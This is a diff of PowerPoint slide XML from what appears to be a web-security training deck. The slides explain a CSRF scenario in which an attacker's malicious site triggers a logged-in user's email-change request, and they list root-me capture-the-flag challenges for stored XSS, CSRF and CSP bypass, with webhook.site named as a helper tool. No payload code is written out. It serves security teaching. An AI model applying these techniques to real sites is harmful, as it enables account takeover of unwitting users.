-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="E2FE21"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="15000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
-            <a:endParaRPr lang="en-IL" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3961076" y="760985"/>
-            <a:ext cx="6447129" cy="5746445"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Consider the following classic </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>scenario:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>A website has authenticated a user and gave them a session cookie.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>The website contains some functionality for changing a user’s email. The email change requests might  look something like this:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Now each time the user browses to this app, it “remembers” them.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="7" name="Picture 6">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B5E059-5994-DBF7-AC04-B767191E9B5D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5332,13 +4789,14 @@
         </p:nvPicPr>
         <p:blipFill>
           <a:blip r:embed="rId3"/>
-          <a:srcRect/>
-          <a:stretch/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="8370558" y="524524"/>
-            <a:ext cx="2989117" cy="243717"/>
+            <a:off x="0" y="165697"/>
+            <a:ext cx="12192000" cy="6858000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5347,10 +4805,10 @@
       </p:pic>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
+          <p:cNvPr id="10" name="TextBox 9">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D002C8-CC40-FE0D-6F22-238967E65159}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5359,8 +4817,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="633984" y="1254616"/>
-            <a:ext cx="2830735" cy="1195199"/>
+            <a:off x="220065" y="1622061"/>
+            <a:ext cx="12024361" cy="3470181"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5373,38 +4831,145 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l">
+            <a:pPr>
               <a:lnSpc>
-                <a:spcPts val="4280"/>
+                <a:spcPct val="200000"/>
               </a:lnSpc>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="24272C"/>
-                </a:solidFill>
-                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>Example - CSRF</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>Today’s Challenges</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:lnSpc>
+                <a:spcPct val="200000"/>
+              </a:lnSpc>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:lnSpc>
+                <a:spcPct val="200000"/>
+              </a:lnSpc>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>https://www.root-me.org/en/Challenges/Web-Client/CSRF-0-protection</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:lnSpc>
+                <a:spcPct val="200000"/>
+              </a:lnSpc>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce -- Hard</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPts val="6000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>Useful tool - https://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>webhook.site</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPts val="6000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              </a:rPr>
+              <a:t>CTF101 - https://ctf101.org</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
               <a:solidFill>
-                <a:srgbClr val="24272C"/>
+                <a:schemeClr val="bg1"/>
               </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
+              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="12" name="Picture 11">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2F12C8-0A3B-4722-9F53-C9F9465C38B0}"/>
+          <p:cNvPr id="20" name="Picture 19">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E373E-2B45-DD01-4EC1-69D14129ED2F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5421,8 +4986,37 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4300208" y="2943125"/>
-            <a:ext cx="7312584" cy="2159227"/>
+            <a:off x="-52426" y="6698054"/>
+            <a:ext cx="12296852" cy="166519"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="Picture 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74EDE1B2-AA06-4838-05EB-AC57A1D6F4EF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
+          <a:srcRect/>
+          <a:stretch/>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="819301" y="524291"/>
+            <a:ext cx="10585095" cy="520900"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5432,7 +5026,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385019689"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4051444837"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5447,7 +5041,13 @@
   <p:cSld>
     <p:spTree>
       <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
+        <p:cNvPr id="1" name="">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD6C382-FD00-702B-7086-EA7DAF585CB9}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
         <p:cNvGrpSpPr/>
         <p:nvPr/>
       </p:nvGrpSpPr>
@@ -5464,492 +5064,7 @@
           <p:cNvPr id="5" name="Picture 4">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FC6D6F-4E9C-868A-98B1-1DA0DDA1F996}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2"/>
-          <a:srcRect/>
-          <a:stretch/>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="12192000" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="Rectangle 5">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3311EF23-F64A-C782-28EA-1A8D297A9F1D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3229817" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="E2FE21"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="15000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
-            <a:endParaRPr lang="en-IL" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3352613" y="646382"/>
-            <a:ext cx="6447129" cy="6413294"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>As attackers, we’d li</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>ke to abuse this functionality to change the user’s email unwantedly.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>We can make prepare malicious website of our own, that will make that same request to the website:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
